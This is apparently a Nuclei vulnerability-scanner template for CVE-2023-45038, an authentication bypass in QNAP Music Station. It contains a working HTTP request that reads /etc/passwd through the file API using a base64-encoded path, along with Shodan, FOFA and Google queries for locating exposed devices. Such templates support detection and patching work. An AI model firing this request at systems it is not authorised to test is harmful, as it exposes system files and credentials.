id: CVE-2023-45038

info:
  name: QNAP Music Station < 5.4.0 - Authentication Bypass
  author: daffainfo
  severity: medium
  description: |
    An improper authentication vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following version: Music Station 5.4.0 and later
  impact: |
    Unauthenticated attackers can bypass authentication in Music Station to read arbitrary files from the QNAP system including /etc/passwd, potentially accessing sensitive configuration files and user credentials.
  remediation: |
    Update QNAP Music Station to version 5.4.0 or later that implements proper authentication validation in the as_get_file_api.php endpoint.
  reference:
    - https://www.qnap.com/en/security-advisory/qsa-24-25
    - https://karzemrok.com/qnap-qsa-24-25
    - https://nvd.nist.gov/vuln/detail/CVE-2023-45038
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2023-45038
    epss-score: 0.06906
    epss-percentile: 0.9155
    cwe-id: CWE-287
    cpe: cpe:2.3:a:qnap:music_station:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: qnap
    product: music_station
    shodan-query: http.title:"qnap"
    fofa-query: title="qnap"
    google-query: intitle:"qnap"
  tags: cve,cve2023,qnap,music_station,auth-bypass,vkev

http:
  - raw:
      - |
        POST /musicstation/api/as_get_file_api.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ssid=dummy&songid=1&tt=ts&f=L2V0Yy9wYXNzd2Q=

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "admin:.*:0:0:"

      - type: word
        part: content_disposition
        words:
          - "filename='passwd'"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022079f9a8c237ebb840ab7dda5190a3b53514d83f811a442e6836694edd607a7ea3022100b6af068b8cc62db31abd7218d311aa9ba611b41a2dfd9b72eb2d04b29c8386a8:922c64590222798bb761d5b6d8e72950